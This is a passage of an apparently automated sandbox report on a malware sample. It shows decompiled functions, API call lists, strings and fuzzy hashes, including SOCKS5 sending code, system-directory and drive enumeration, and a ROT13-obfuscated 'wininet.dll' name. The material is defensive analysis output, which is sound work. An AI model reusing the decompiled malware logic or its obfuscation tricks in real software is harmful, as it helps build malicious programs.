					memset( &_v60, 0, 4 << 2);
					_v60 = 2;
					_v56 =  *_t60;
					_v58 = _v30 & 0x0000ffff;
					_v96 = 0x10;
					_t40 =  &_v60;
					_v100 = _t40;
					_v104 = _t51;
					L10003024();
					_t65 = _t63 + 0xc - 0xc;
					if(_t40 == 0xffffffff) {
						_v100 =  &_v30;
						_v104 = _t60;
						_v108 = _a8;
						_v112 = 5;
						 *_t65 = _a4;
						E1000140F();
						 *_t65 = _t51;
						L10003014();
						_t51 = 0xffffffff;
					}
				} else {
					E1000140F(_a4, 1, _a8, _t60,  &_v30);
				}
				return _t51;
			}

0x10001457
0x1000145a
0x1000145d
0x10001460
0x10001463
0x10001467
0x1000146b
0x10001473
0x1000147b
0x10001482
0x10001487
0x1000148a
0x1000148f
0x100014bb
0x100014c6
0x100014c8
0x100014d0
0x100014d7
0x100014db
0x100014e3
0x100014e6
0x100014ea
0x100014ed
0x100014f2
0x100014f8
0x100014fd
0x10001501
0x10001508
0x1000150c
0x10001517
0x1000151a
0x1000151f
0x10001522
0x1000152a
0x1000152a
0x10001491
0x100014b1
0x100014b1
0x1000153d

APIs

socket.WS2_32 ref: 10001482
Socks5SendCode.SHERVANS ref: 100014B1

Part of subcall function 1000140F: swrite.SHERVANS ref: 1000144A

connect.WS2_32 ref: 100014ED
Socks5SendCode.SHERVANS ref: 1000151A
closesocket.WS2_32 ref: 10001522

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: CodeSendSocks5$closesocketconnectsocketswrite
String ID:
API String ID: 1690081365-0
Opcode ID: 226da635e8a6871d8eb6d44e768528b8faa0e03256744c755adbe7396fca87cb
Instruction ID: 20981c635e85231f24b59aa8ab89d4f0d4c72e8356007f7a924271a659283d8c
Opcode Fuzzy Hash: 226da635e8a6871d8eb6d44e768528b8faa0e03256744c755adbe7396fca87cb
Instruction Fuzzy Hash: 5821C6B5904309ABDB00DFA8D48429EBBF4FF48360F108A2EF99897391D375A954DB52

Uniqueness

Uniqueness Score: -1.00%

Function 004028E2 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 004028F6
lstrcat.KERNEL32 ref: 00402910
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 00402929

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Strings

L@, xrefs: 004028FE
admin@bigtits.com, xrefs: 00402918

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcat$ConnectedHandleInternetLibraryLoadModuleSleepState
String ID: L@$admin@bigtits.com
API String ID: 2287753751-2810593236
Opcode ID: c4923e9d2adc1735435ee3343d15d9114c514d9cd1cf3e75ac1c13b8b8656890
Instruction ID: f8f521ecf4af99865028921a37a865861f0bf00d847523e115314e8123b3051d
Opcode Fuzzy Hash: c4923e9d2adc1735435ee3343d15d9114c514d9cd1cf3e75ac1c13b8b8656890
Instruction Fuzzy Hash: 8611CE769053198BCB51EF64D9845CEBBF4EF44314F40857BE885A3240EB349698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 10002209 Relevance: 7.5, APIs: 5, Instructions: 34
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002209(CHAR* _a4, int _a8, CHAR* _a12) {
				void* _v12;
				void* _v20;
				void* _v24;
				CHAR* _v28;
				int _t13;
				CHAR* _t14;
				int _t15;
				CHAR* _t16;
				void* _t17;
				CHAR** _t20;

				_t16 = _a4;
				_t15 = _a8;
				memset(_t16, 0, _t15);
				_t13 = GetSystemDirectoryA(_t16, _t15);
				_v28 = _t16;
				L10003570();
				_t20 = _t17 - 4;
				if( *((char*)(_t13 + _t16 - 1)) != 0x5c) {
					_v28 = 0x1000508e;
					 *_t20 = _t16;
					L10003578();
					_t20 = _t20 - 8;
				}
				_t14 = _a12;
				_v28 = _t14;
				 *_t20 = _t16;
				L10003578();
				return _t14;
			}

0x10002211
0x10002214
0x10002226
0x10002232
0x1000223a
0x1000223d
0x10002242
0x1000224a
0x1000224c
0x10002254
0x10002257
0x1000225c
0x1000225c
0x1000225f
0x10002262
0x10002266
0x10002269
0x10002277

APIs

memset.MSVCRT ref: 10002226
GetSystemDirectoryA.KERNEL32 ref: 10002232
lstrlen.KERNEL32 ref: 1000223D
lstrcat.KERNEL32 ref: 10002257
lstrcat.KERNEL32 ref: 10002269

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcat$DirectorySystemlstrlenmemset
String ID:
API String ID: 1065462249-0
Opcode ID: 5b75b92667313997f23b2e058039c06bba9c640d4edaca3627a5a6efffba8954
Instruction ID: 135e321319e3b7b44d062fa0e30293860b296fd840e12ca3df5e4efe39fd7587
Opcode Fuzzy Hash: 5b75b92667313997f23b2e058039c06bba9c640d4edaca3627a5a6efffba8954
Instruction Fuzzy Hash: C9F037B5808B14AAE702FF28D98655EBFA8EF04691F40891DF88847209D735A658CBD3

Uniqueness

Uniqueness Score: -1.00%

Function 00404620 Relevance: 7.5, APIs: 5, Instructions: 34
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404620(CHAR* _a4, int _a8, CHAR* _a12) {
				void* _v12;
				void* _v20;
				void* _v24;
				CHAR* _v28;
				int _t13;
				CHAR* _t14;
				int _t15;
				CHAR* _t16;
				void* _t17;
				CHAR** _t20;

				_t16 = _a4;
				_t15 = _a8;
				memset(_t16, 0, _t15);
				_t13 = GetSystemDirectoryA(_t16, _t15);
				_v28 = _t16;
				L0040C310();
				_t20 = _t17 - 4;
				if( *((char*)(_t13 + _t16 - 1)) != 0x5c) {
					_v28 = 0x40f156;
					 *_t20 = _t16;
					L0040C328();
					_t20 = _t20 - 8;
				}
				_t14 = _a12;
				_v28 = _t14;
				 *_t20 = _t16;
				L0040C328();
				return _t14;
			}

0x00404628
0x0040462b
0x0040463d
0x00404649
0x00404651
0x00404654
0x00404659
0x00404661
0x00404663
0x0040466b
0x0040466e
0x00404673
0x00404673
0x00404676
0x00404679
0x0040467d
0x00404680
0x0040468e

APIs

memset.MSVCRT ref: 0040463D
GetSystemDirectoryA.KERNEL32 ref: 00404649
lstrlen.KERNEL32 ref: 00404654
lstrcat.KERNEL32 ref: 0040466E
lstrcat.KERNEL32 ref: 00404680

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcat$DirectorySystemlstrlenmemset
String ID:
API String ID: 1065462249-0
Opcode ID: 52e21126391f9f1a99804af5917ba2fff1412d2631d262131c3ca1ad05ec0486
Instruction ID: 403430f860fbc260acd97b7d31e4c447ffd2c09bc4da5a50c9a35cc548e728c4
Opcode Fuzzy Hash: 52e21126391f9f1a99804af5917ba2fff1412d2631d262131c3ca1ad05ec0486
Instruction Fuzzy Hash: F8F019B1408714DBD700BF29D98555EBFA4AB44754F40892EFC8867282D3399A588BDB

Uniqueness

Uniqueness Score: -1.00%

Function 10001E04 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

xstrchr.SHERVANS ref: 10001EAA
xstrchr.SHERVANS ref: 10001EEA

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 10001E12
abcdefghijklmnopqrstuvwxyz, xrefs: 10001E57

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: xstrchr
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ$abcdefghijklmnopqrstuvwxyz
API String ID: 1535612035-4170113403
Opcode ID: bc1ef4a9f8f1add477f6933fc24e9eacfb8676c16534aea7655073907d0485ef
Instruction ID: a9ec9f0fff6549f24d3912a7d9d51164a33b52da91e11de3f78b76783671d1e7
Opcode Fuzzy Hash: bc1ef4a9f8f1add477f6933fc24e9eacfb8676c16534aea7655073907d0485ef
Instruction Fuzzy Hash: 22315E74A052698FDB15CFBCC9C05AEBFF4AB08382F04016AE844D7359E735AA45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 10003150 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

GetAtomNameA.KERNEL32 ref: 1000316F

Part of subcall function 10003430: fprintf.MSVCRT ref: 1000345D
Part of subcall function 10003430: fflush.MSVCRT ref: 1000346D
Part of subcall function 10003430: abort.MSVCRT(?,?,?,?,?,100031CE), ref: 10003472

Strings

../../gcc/gcc/config/i386/w32-shared-ptr.c, xrefs: 100031C0
w32_sharedptr->size == sizeof(W32_EH_SHARED), xrefs: 100031A7
GetAtomNameA (atom, s, sizeof(s)) != 0, xrefs: 100031CE

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: AtomNameabortfflushfprintf
String ID: ../../gcc/gcc/config/i386/w32-shared-ptr.c$GetAtomNameA (atom, s, sizeof(s)) != 0$w32_sharedptr->size == sizeof(W32_EH_SHARED)
API String ID: 2513348418-2567175902
Opcode ID: b5b89244b8b56d368d30c6de513500384bbf397f3e0a96e467b4627a87de939c
Instruction ID: 294674767859e6a3630ece78654cf0563df7f20052ecafb954434dc6b69ec127
Opcode Fuzzy Hash: b5b89244b8b56d368d30c6de513500384bbf397f3e0a96e467b4627a87de939c
Instruction Fuzzy Hash: 77015270A04382ABF705DFA5C08429FBBE4EF893C5F50C83EE5898B759D67988409B46

Uniqueness

Uniqueness Score: -1.00%

Function 00404F0A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39librarynetworkCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00404F27
LoadLibraryA.KERNEL32 ref: 00404F41
InternetGetConnectedState.WININET ref: 00404F6B

Strings

jvavarg.qyy, xrefs: 00404F11

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: ConnectedHandleInternetLibraryLoadModuleState
String ID: jvavarg.qyy
API String ID: 2811557832-2169444084
Opcode ID: 7c6175a941508692fdaf67fbae8ce577e0da1e0ff510d98013a560bc4e03a36a
Instruction ID: fa78873cf606c18224dba544ef8f20ca223ab6e2b08164375e4fcb1cbc50bc80
Opcode Fuzzy Hash: 7c6175a941508692fdaf67fbae8ce577e0da1e0ff510d98013a560bc4e03a36a
Instruction Fuzzy Hash: 03F062B551530486DB10BF359AC629D7AE85F41368F058A3EF8A1A32D2E73CD64CC716

Uniqueness

Uniqueness Score: -1.00%

Function 00403A38 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38sleepCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403A5C
GetDriveTypeA.KERNEL32 ref: 00403A9D
Sleep.KERNEL32 ref: 00403AB1

Part of subcall function 00403790: _mbscpy.MSVCRT ref: 004037D8
Part of subcall function 00403790: memset.MSVCRT ref: 0040383B
Part of subcall function 00403790: FindFirstFileA.KERNEL32 ref: 0040385C
Part of subcall function 00403790: lstrcpy.KERNEL32 ref: 004038CC
Part of subcall function 00403790: _mbscat.MSVCRT ref: 00403910

Strings

C:\, xrefs: 00403A85

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: memset$DriveFileFindFirstSleepType_mbscat_mbscpylstrcpy
String ID: C:\
API String ID: 3442435128-3404278061
Opcode ID: 80ea77316c1bc4b967dddd0ea6824f094094c5e0836f8c07d72c2391017bcb4f
Instruction ID: ed4c8215e4a3680eb399a4dacd5268703db01feabc7491714eb621602a4a9c6d
Opcode Fuzzy Hash: 80ea77316c1bc4b967dddd0ea6824f094094c5e0836f8c07d72c2391017bcb4f
Instruction Fuzzy Hash: 1A015BB0C143AC89DB65AB6588563DEBFB49F01319F0484DED6C826282C7784BD8CFD6

Uniqueness

Uniqueness Score: -1.00%

Function 0040B740 Relevance: 6.4, APIs: 5, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040B740(intOrPtr* _a4) {
				void* _v16;
				void* _v20;
				void* _v24;
				void** _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __esi;
				intOrPtr _t37;
				long _t39;
				void* _t40;
				void* _t41;
				void* _t43;
				void* _t47;
				void* _t58;
				void** _t61;
				void* _t62;
				intOrPtr* _t64;
				void* _t68;
				intOrPtr* _t72;
				intOrPtr* _t76;
				long* _t77;

				_t37 =  *0x418284;
				_t72 = _a4;
				if(_t37 == 0) {
					E0040B0E0(_t37);
					_t37 =  *0x418284;
					if( *((intOrPtr*)(_t37 + 0x30)) >= 0) {
						goto L2;
					} else {
						goto L18;
					}
					L8:
					if(_t68 == 5) {
						return 5;
					} else {
						if(_t68 != 0) {
							L13:
							_t43 = 3;
							goto L14;
						} else {
							if(_t64 == 0) {
								L5:
								_t41 =  *_v24;
								_v24 = _t41;
								while(1) {
									L6:
									_t64 = 0;
									_t68 = 5;
									if(_t41 != 0) {
										_t64 =  *((intOrPtr*)(_t41 + 0x18));
										_t68 = 0;
									}
									goto L8;
								}
							} else {
								_v40 = _t61;
								_v44 = _t72;
								 *_t76 = 1;
								_v52 =  *_t72;
								_v48 =  *((intOrPtr*)(_t72 + 4));
								_v56 = 1;
								_t47 =  *_t64();
								if(1 == 6) {
									 *((intOrPtr*)(_t72 + 0xc)) = 0;
									 *((intOrPtr*)(_t72 + 0x10)) = _v24;
									_v24 = _v20;
									_t43 = E0040B6B0(_t72, _t61);
									if(_t43 == 7) {
										_t51 =  *0x418284;
										_t62 = _v24;
										if(_t51 == 0) {
											E0040B0E0(_t51);
											_t51 =  *0x418284;
										}
										if( *(_t51 + 0x30) < 0) {
											E0040B3B0(_t62, _t74);
											_t51 =  *0x418284;
										}
										_t74 =  *(_t51 + 0x30);
										if( *(_t51 + 0x30) != 0) {
											_v56 = _t62;
											 *_t76 =  *((intOrPtr*)(_t51 + 0x2c));
											if(TlsSetValue(??, ??) == 0) {
												GetLastError();
											}
										} else {
											 *((intOrPtr*)(_t51 + 0x28)) = _t62;
										}
										_t51 = _v24;
										_t76 =  *((intOrPtr*)(_v24 + 0x28));
										goto __ecx;
									}
									L14:
									return _t43;
								} else {
									if(_t47 == 8) {
										goto L5;
									} else {
										goto L13;
									}
								}
							}
						}
					}
				} else {
					if( *((intOrPtr*)(_t37 + 0x30)) < 0) {
						L18:
						E0040B3B0(_t58, _t74);
						_t37 =  *0x418284;
					}
				}
				L2:
				if( *((intOrPtr*)(_t37 + 0x30)) != 0) {
					_t39 = GetLastError();
					 *_t76 =  *((intOrPtr*)(_t37 + 0x2c));
					_t74 = _t39;
					_t40 = TlsGetValue(??);
					_t77 = _t76 - 4;
					 *_t77 = _t39;
					SetLastError(??);
					_t41 = _t40;
					_t76 = _t77 - 4;
				} else {
					_t41 =  *(_t37 + 0x28);
				}
				_v20 = _t41;
				_t61 =  &_v24;
				_v24 = _t41;
				goto L6;
			}

0x0040b749
0x0040b74e
0x0040b753
0x0040b81c
0x0040b821
0x0040b82b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b798
0x0040b79b
0x0040b7ef
0x0040b79d
0x0040b79f
0x0040b7d6
0x0040b7d6
0x00000000
0x0040b7a1
0x0040b7a3
0x0040b780
0x0040b783
0x0040b785
0x0040b788
0x0040b788
0x0040b788
0x0040b78c
0x0040b791
0x0040b793
0x0040b796
0x0040b796
0x00000000
0x0040b791
0x0040b7a5
0x0040b7a5
0x0040b7a9
0x0040b7b2
0x0040b7b9
0x0040b7c2
0x0040b7c6
0x0040b7ca
0x0040b7cf
0x0040b840
0x0040b84c
0x0040b852
0x0040b857
0x0040b85f
0x0040b865
0x0040b86a
0x0040b86f
0x0040b893
0x0040b898
0x0040b898
0x0040b876
0x0040b8be
0x0040b8c3
0x0040b8c3
0x0040b878
0x0040b87d
0x0040b8a2
0x0040b8a6
0x0040b8b4
0x0040b8b6
0x0040b8b6
0x0040b87f
0x0040b87f
0x0040b87f
0x0040b882
0x0040b88e
0x0040b891
0x0040b891
0x0040b7db
0x0040b7e2
0x0040b7d1
0x0040b7d4
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b7d4
0x0040b7cf
0x0040b7a3
0x0040b79f
0x0040b759
0x0040b75e
0x0040b831
0x0040b831
0x0040b836
0x0040b836
0x0040b75e
0x0040b764
0x0040b769
0x0040b7f3
0x0040b7f9
0x0040b7fc
0x0040b7fe
0x0040b804
0x0040b809
0x0040b80c
0x0040b812
0x0040b814
0x0040b76f
0x0040b76f
0x0040b76f
0x0040b772
0x0040b775
0x0040b778
0x00000000

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93a37cc761da05d28123ec6793a1aa2a7504f56957f8d3d69b3e88f2f85eb7ef
Instruction ID: 45d732202371662b8addf3eaaaff00240ebc5fc11857fefe16626fd26bfd471c
Opcode Fuzzy Hash: 93a37cc761da05d28123ec6793a1aa2a7504f56957f8d3d69b3e88f2f85eb7ef
Instruction Fuzzy Hash: C4413A75A002058FCB44EF69D684A6AB7F5FB88310F15857ED805AB3A1D738ED01CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9C0 Relevance: 6.4, APIs: 5, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040B9C0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v40;
				intOrPtr _t39;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t47;
				void* _t54;
				void* _t64;
				intOrPtr _t73;
				intOrPtr* _t79;
				long* _t80;

				_t59 = __ebx;
				_v8 = __edi;
				_t73 = _a4;
				_v16 = __ebx;
				_v12 = __esi;
				_t39 =  *0x418284;
				if(_t39 == 0) {
					E0040B0E0(_t39);
					_t39 =  *0x418284;
					_t76 =  *(_t39 + 0x30);
					if( *(_t39 + 0x30) >= 0) {
						L2:
						if( *(_t39 + 0x30) != 0) {
							L9:
							_t41 = GetLastError();
							 *_t79 =  *((intOrPtr*)(_t39 + 0x2c));
							_t76 = _t41;
							_t42 = TlsGetValue(??);
							_t80 = _t79 - 4;
							 *_t80 = _t41;
							SetLastError(??);
							_t43 = _t42;
							_v20 = _t43;
							_v24 = _t43;
							_t79 = _t80 - 4;
							 *((intOrPtr*)(_t73 + 0xc)) = _a8;
							 *((intOrPtr*)(_t73 + 0x10)) = _a12;
							_t47 = E0040B8D0(_t73,  &_v24);
							if(_t47 != 7) {
								L4:
								return _t47;
							}
							L11:
							_t48 =  *0x418284;
							_t64 = _v24;
							if(_t48 == 0) {
								E0040B0E0(_t48);
								_t48 =  *0x418284;
							}
							if( *((intOrPtr*)(_t48 + 0x30)) < 0) {
								E0040B3B0(_t64, _t76);
								_t48 =  *0x418284;
							}
							if( *((intOrPtr*)(_t48 + 0x30)) != 0) {
								_v40 = _t64;
								 *_t79 =  *((intOrPtr*)(_t48 + 0x2c));
								if(TlsSetValue(??, ??) == 0) {
									GetLastError();
								}
							} else {
								 *((intOrPtr*)(_t48 + 0x28)) = _t64;
							}
							_t48 = _v24;
							_t79 =  *((intOrPtr*)(_v24 + 0x28));
							goto __ecx;
						}
						L3:
						_t54 =  *(_t39 + 0x28);
						_v20 = _t54;
						_v24 = _t54;
						 *((intOrPtr*)(_t73 + 0xc)) = _a8;
						 *((intOrPtr*)(_t73 + 0x10)) = _a12;
						_t47 = E0040B8D0(_t73,  &_v24);
						if(_t47 == 7) {
							goto L11;
						}
						goto L4;
					}
					L7:
					E0040B3B0(_t59, _t76);
					_t39 =  *0x418284;
					if( *(_t39 + 0x30) == 0) {
						goto L3;
					}
					goto L9;
				}
				_t76 =  *(_t39 + 0x30);
				if( *(_t39 + 0x30) < 0) {
					goto L7;
				}
				goto L2;
			}

0x0040b9c0
0x0040b9c6
0x0040b9c9
0x0040b9cc
0x0040b9cf
0x0040b9d2
0x0040b9d9
0x0040ba20
0x0040ba25
0x0040ba2a
0x0040ba2f
0x0040b9e2
0x0040b9e7
0x0040ba60
0x0040ba63
0x0040ba69
0x0040ba6c
0x0040ba6e
0x0040ba74
0x0040ba79
0x0040ba7c
0x0040ba82
0x0040ba87
0x0040ba8a
0x0040ba90
0x0040ba93
0x0040ba99
0x0040ba9e
0x0040baa6
0x0040ba11
0x0040ba1d
0x0040ba1d
0x0040bab0
0x0040bab0
0x0040bab5
0x0040baba
0x0040bafd
0x0040bb02
0x0040bb02
0x0040bac1
0x0040bb09
0x0040bb0e
0x0040bb0e
0x0040bac8
0x0040bae1
0x0040bae5
0x0040baf3
0x0040baf5
0x0040baf5
0x0040baca
0x0040baca
0x0040baca
0x0040bacd
0x0040bad9
0x0040badc
0x0040badc
0x0040b9e9
0x0040b9e9
0x0040b9ef
0x0040b9f2
0x0040b9f8
0x0040b9fe
0x0040ba03
0x0040ba0b
0x00000000
0x00000000
0x00000000
0x0040ba0b
0x0040ba40
0x0040ba40
0x0040ba45
0x0040ba4f
0x00000000
0x00000000
0x00000000
0x0040ba51
0x0040b9db
0x0040b9e0
0x00000000
0x00000000
0x00000000

APIs

GetLastError.KERNEL32 ref: 0040BA63
TlsGetValue.KERNEL32 ref: 0040BA6E
SetLastError.KERNEL32 ref: 0040BA7C
TlsSetValue.KERNEL32 ref: 0040BAE8
GetLastError.KERNEL32 ref: 0040BAF5

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: 76128aff822269898b8914e3844feebccba58d7589f724bc458a13517587ad4f
Instruction ID: 23407aeb104a5e4d22db15432d45e4df2a3b4d44022ab58e5814b8ef13b66587
Opcode Fuzzy Hash: 76128aff822269898b8914e3844feebccba58d7589f724bc458a13517587ad4f
Instruction Fuzzy Hash: A341F8B4B006198FCB50DF69D58099ABBF4FF08310B1585BAD919AB351E734AD00CFDA

Uniqueness

Uniqueness Score: -1.00%

Function 00402E0D Relevance: 6.3, APIs: 5, Instructions: 65stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 00402E21
lstrcat.KERNEL32 ref: 00402E3B

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 00402E63
lstrcat.KERNEL32 ref: 00402E85
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 00402EAA

